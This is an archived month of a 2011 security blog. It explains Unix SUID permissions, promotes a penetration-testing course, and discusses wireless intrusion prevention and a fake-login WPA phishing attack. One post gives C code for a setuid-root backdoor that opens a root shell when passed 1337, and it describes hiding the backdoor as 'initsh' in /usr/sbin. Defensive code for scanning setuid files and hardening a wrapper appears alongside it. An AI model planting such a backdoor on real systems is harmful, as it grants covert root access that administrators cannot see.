Monthly Archives: October 2011


Here I explain some UNIX system administration around the Set User ID bit, or SUID, with a short video tutorial after the break.

In UNIX, a binary can be marked so that it runs with the privileges of the file’s owner, no matter who executes it. This is the SUID (set-user-ID) attribute. You set it with chmod by putting a 4 in front of the normal octal mode:

chmod 4XXX file.exe

I put the exe extension just to show that the file is a binary. If you chown (change ownership of) the file to root, it will run as UID (User ID) 0, i.e. user “root.” Do the chown first: on Linux, changing a file’s owner clears its setuid bit, so the order is chown root, then chmod 4XXX. Here is what the file looks like after chmod(ing) it to 4XXX (XXX being your normal rwx bits for owner, group and other, e.g. 777 or 755; in our case I used 4755):

-rwsr-xr-x 1 root root 0 2011-10-27 22:21 file.exe

Here is what this means: the lowercase “s” in the owner’s execute slot means the file is “suid,” or “set user id,” so the kernel switches the process’s effective UID to the owner’s (in our case root, UID 0) before executing it. A capital “S” in that slot would mean the setuid bit is set but the owner’s execute bit is not, which is useless.
The “r” is “read,” “w” is “write,” and “x” is “executable,” in sets of three for Owner, Group and Other respectively.

How does it know that the owner root is UID 0, you say? It does not have to look anything up: the inode stores the owner as a number, and that number becomes the effective UID. Names only come into play when ls prints the listing and maps 0 to “root” through the lines in /etc/passwd:

root:x:0:0:root:/root:/bin/bash

The first zero is the UID, the second is the GID, or group ID. The “x” means that the password hash (and its salt) is kept in the /etc/shadow file instead of here.
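To show where those numbers actually come from, here is an added example (not code from the original post): a small C program that reads st_mode and st_uid straight from the inode, renders the mode string the way ls -l does (including the s versus S distinction), and walks a directory tree to list every setuid file, which is also the check a defender runs instead of looking for a particular filename. The directory to scan is taken from the command line and defaults to /usr/bin.

```c
/* setuid_probe.c: inspect setuid files the way the kernel sees them.
 * Added example for this post, not the author's code.
 * Build: cc -o setuid_probe setuid_probe.c */
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>
#include <pwd.h>
#include <ftw.h>

/* Render st_mode like ls -l. Lowercase s = setuid/setgid plus execute,
 * uppercase S = the bit is set but the matching execute bit is missing. */
void mode_to_string(mode_t m, char out[11]) {
    const char *rwx = "rwxrwxrwx";
    out[0] = S_ISDIR(m) ? 'd' : S_ISLNK(m) ? 'l' : '-';
    for (int i = 0; i < 9; i++)
        out[i + 1] = (m & (0400 >> i)) ? rwx[i] : '-';
    if (m & S_ISUID) out[3] = (m & S_IXUSR) ? 's' : 'S';
    if (m & S_ISGID) out[6] = (m & S_IXGRP) ? 's' : 'S';
    if (m & S_ISVTX) out[9] = (m & S_IXOTH) ? 't' : 'T';
    out[10] = '\0';
}

/* Report who a file would run as if it is setuid. The numeric uid comes from
 * the inode (st_uid); /etc/passwd is never needed for the decision. */
int describe_setuid(const char *path, uid_t *owner, int *is_setuid) {
    struct stat st;
    if (lstat(path, &st) != 0)
        return -1;
    *owner = st.st_uid;
    *is_setuid = (st.st_mode & S_ISUID) != 0;
    return 0;
}

/* nftw callback: print each regular file that carries the setuid bit. */
static int setuid_count;
static int visit(const char *fpath, const struct stat *sb, int type,
                 struct FTW *ftw) {
    (void)ftw;
    if (type == FTW_F && (sb->st_mode & S_ISUID)) {
        char mode[11];
        struct passwd *pw = getpwuid(sb->st_uid); /* only to print a name */
        mode_to_string(sb->st_mode, mode);
        printf("%s %5u (%s) %s\n", mode, (unsigned)sb->st_uid,
               pw ? pw->pw_name : "?", fpath);
        setuid_count++;
    }
    return 0;
}

/* Walk dir without following symlinks or crossing mounts; return the number
 * of setuid files found, or -1 if the walk could not start. */
int scan_setuid(const char *dir) {
    setuid_count = 0;
    if (nftw(dir, visit, 16, FTW_PHYS | FTW_MOUNT) != 0)
        return -1;
    return setuid_count;
}

int main(int argc, char *argv[]) {
    const char *dir = argc > 1 ? argv[1] : "/usr/bin";
    int n = scan_setuid(dir);
    printf("%d setuid file(s) under %s\n", n, dir);
    return n < 0;
}
```

Run it as ./setuid_probe / on a freshly installed box, keep the output as a baseline, and diff against it later: a new entry in /usr/sbin that the package manager does not own is exactly the kind of “initsh” this post describes.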

Now, this does not work with shell scripts, and not only for security hygiene: Linux and most modern UNIXes ignore the setuid bit on “#!” scripts, because the kernel opens the script, then execs the interpreter, which re-opens the file by name, and an attacker could swap the file in between. If you’d like to do something like that, you would need to play with sudo and the sudoers file, but not all UNIX systems come with sudo.

So how do we work around that? By compiling a small C program that spawns the shell via a system() call:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    if (argc < 2)              /* no argument: argv[1] is NULL, don't crash */
        return 1;
    if (atoi(argv[1]) == 1337) {
        printf("shelling out.\n");
        /* The setuid bit only raises the effective uid. bash, when it is
         * /bin/sh, drops euid back to the real uid unless run with -p, so
         * make root the real uid as well before spawning the shell. */
        if (setuid(0) != 0)
            return 1;
        system("sh");
    }
    return 0;
}

All this simple application does is run “sh”, spawning a new shell as root, if and only if the number 1337 is passed to it. Why did I include the number part? Well, to backdoor a system it’s incredibly easy to hide this small application, and since it is compiled, the owner of the machine won’t know what it is if they find it. I usually call it something like “initsh” and put it in /usr/sbin, which looks very unsuspicious to a novice system administrator. My secret is out!!

echo "$PATH" | tr ':' '\n' | xargs ls 2>/dev/null | grep initsh
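The wrapper above hands the caller’s entire environment to /bin/sh through system(), which is exactly how setuid wrappers get abused in the other direction: PATH, IFS, ENV and BASH_ENV are all under the invoking user’s control, and once real and effective uid match, so is LD_PRELOAD. For contrast, here is an added example (not the post’s code) of how a setuid wrapper for one fixed, root-owned script is usually hardened: validate the argument, build a minimal environment, make the uid change stick, and execve an absolute path instead of calling system(). The target path /usr/local/sbin/rotate-logs.sh is a hypothetical placeholder.

```c
/* safe_wrapper.c: a setuid wrapper that does not trust its environment.
 * Added example for this post, not the author's code.
 * Build: cc -o rotate-logs safe_wrapper.c; chown root; chmod 4755 */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* Hypothetical fixed target: one specific script, owned by root and
 * writable by nobody else. Never take the program to run from argv. */
#define TARGET    "/usr/local/sbin/rotate-logs.sh"
#define SAFE_PATH "PATH=/usr/sbin:/usr/bin:/sbin:/bin"
#define SAFE_IFS  "IFS= \t\n"

/* Build the child's environment from scratch. system() would instead pass
 * the caller's PATH, IFS, ENV, BASH_ENV ... straight to /bin/sh. Returns
 * the number of entries set, or -1 if the array is too small. */
int build_safe_env(char *envp[], size_t n) {
    if (n < 3)
        return -1;
    envp[0] = SAFE_PATH;
    envp[1] = SAFE_IFS;
    envp[2] = NULL;
    return 2;
}

/* Accept only the argument shape the target needs (here: one short
 * digits-only token), so no shell metacharacters are ever forwarded. */
int arg_is_safe(const char *arg) {
    if (arg == NULL || *arg == '\0' || strlen(arg) > 16)
        return 0;
    for (const char *p = arg; *p; p++)
        if (*p < '0' || *p > '9')
            return 0;
    return 1;
}

/* Validate, then make the elevated uid the real uid as well (with euid 0,
 * setuid() sets real, effective and saved uid), then exec the fixed target
 * with an absolute path and our own environment. Returns -1 on any failure;
 * on success execve never returns. */
int run_target(const char *arg) {
    char *envp[3];
    char *const argv[] = { (char *)TARGET, (char *)arg, NULL };
    if (!arg_is_safe(arg))
        return -1;
    if (build_safe_env(envp, 3) < 0)
        return -1;
    if (setuid(geteuid()) != 0)
        return -1;
    execve(TARGET, argv, envp);
    return -1;                      /* only reached if execve failed */
}

int main(int argc, char *argv[]) {
    if (argc != 2 || run_target(argv[1]) != 0) {
        fprintf(stderr, "usage: %s <digits>\n", argv[0]);
        return 1;
    }
    return 0;
}
```

The difference from the backdoor is not the setuid bit, which is the same in both; it is that nothing the caller controls (argument, environment, search path, current directory) reaches the privileged child unfiltered.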

Check out the video below:

~Douglas.

Here is the first screenshot from my development:

~Douglas.

One of my beta testers hosts his own infosec training course called “Ninja Security.” I had the pleasure of going through some of the course materials (Real World Penetration Testing) and, even though they were in Arabic, the OS, presentations and configuration files were all in English, so it wasn’t hard to follow along at all. He attacks vulnerabilities very creatively and his presentation is very clear. He even uses WEAKERTHAN 3.6 for the WPA(2) Phishing Attack, and WiFiCake-ng! :D The Ninja Security Team’s Penetration Testing to the Max course is completely in English and is their latest course release.

http://ninja-sec.com/

Ninja Security Syllabus

Information Intelligence Techniques

• Open Source Intelligence Gathering
• Stealth Auditing and Network Scanning
• Advanced Network Reconnaissance
• Enumerating Internal Network From Outside

Web Exploitation Techniques

• Advanced SQL Injection Exploitation (MySQL + MS-SQL + Oracle)
• Advanced Blind SQL Injection Exploitation (MySQL + Oracle)
• Exploiting File Uploads to Full System Access
• Exploiting Remote File Include to Full System Access
• Exploiting Local File Include to Full System Access
• Exploiting Reflected XSS to Full System Access
• Exploiting Stored XSS to Full System Access
• Exploiting Command Injection to Full System Access
• Exploiting CSRF to Full System Access

Attacking and Owning Techniques

• Owning FULLY PATCHED systems (with un-guessable/un-crackable passwords and OS protections like ASLR and DEP)
• Owning Windows Domain Controller from Outside
• Owning Windows Domain Controller from Inside
• Owning MS-SQL, Oracle and MySQL Databases
• Attacking and Owning VoIP Systems

Privilege Escalation Techniques

• Privilege Escalation in Windows (from Guest to System)
• Privilege Escalation in Linux (from nobody to root)

Tactical Post Exploitation Techniques

• Tactical Windows Post Exploitation
• Tactical Linux Post Exploitation
• Tactical Mac OS X Post Exploitation

Bypassing and Defeating Techniques

• Bypassing and Escaping Restricted Environments
• Bypassing Group Policy
• Evading Anti-Virus (100% clean)
• Defeating PHP security
• Defeating XSS, SQL Injection and File Upload Protections
• Defeating Web Application Firewall (mod_security)
• Bypassing Port Security and NAC solutions

• Prerequisites: Students should be familiar with Metasploit and VMware.
• Pricing: 1,500 USD
• What is included: Course Guide, Videos, Tools and VMware Images.

I’d fully recommend it [Real World Penetration Testing], even to those who do not speak Arabic, simply for the clear demonstrations, the huge amount of hard work put into the course materials, and for his support. And again, the latest course by the Ninja Security team is completely in English: Penetration Testing to the Max. :)

Thank you Ninja Security Team!!

~Douglas.

Thomas d’Otreppe’s latest work on creating an open source WIPS (wireless intrusion prevention system) at DerbyCon:

This is a good video, and his methods are creative, but all of them are things I have been thinking over for about two years now. My first implementation of an open WIPS (which took me about a year to finally start coding) was a simple script that ran from a “server,” just like his:

Then, after being interviewed by a security consultant, he gave me the idea to implement this directly in the router itself:

What his [Thomas's] OpenWIPS-ng has over mine is actual “frame analysis.” At the time, I wasn’t as familiar with C programming and libpcap, and decided it wasn’t really necessary to re-invent the wheel, as I knew how TCP/IP handled things like broadcast frames within a simple BSS. Thus, I used tcpdump. :) I am excited for his project and would love to contribute, but I’m already too swamped with my own projects now. What would be a good idea is to make yet another live CD just for his project. You could configure Lighttpd/Apache2/Nginx to run as root and create a nice web interface to log into and run the commands, analyze the logs, etc. :)

Then, just as I was studying for the CWSP exam, I thought of two things. The first is the WPA(2) Phishing Attack. This attack simply creates an AP from a radio and hosts a DHCP server and an HTTP server. When the victim associates with the (cloned) network, he or she is presented with a typical Windows login screen:

Which brings me to the final WIPS theory I had. The second idea was a true protocol (802.11) amendment, close to 802.11w (which has yet to be implemented), which protects the network from injected management (MGMT) frames:

It uses signal-power statistics at the medium level to reject frames that do not fall within a simple threshold which the math computes within the firmware of the radios.

The mailing lists are compiled. The kernel is under dev. A few of you already asked about e17 and it looks like I am sticking with FluxBox for the window manager. There are still a few bugs in e17 that get under my skin and FB is super light weight.

If you have any requests for software I should add, including your own, let me know! I am going by these statistics: http://bit.ly/pkeF0j for my release. Some software I have been working on fell perfectly into those forum posts, including the pCrack Suite, and this also gives me a chance to learn about new products along the way.

I will add a GUI application version of xrandr and a few others to reset the wallpaper and screen sizes. Also a few heavy changes have been made to WiFiCake-NG which will be released in the latest version of WT4.

Thanks for stopping by!
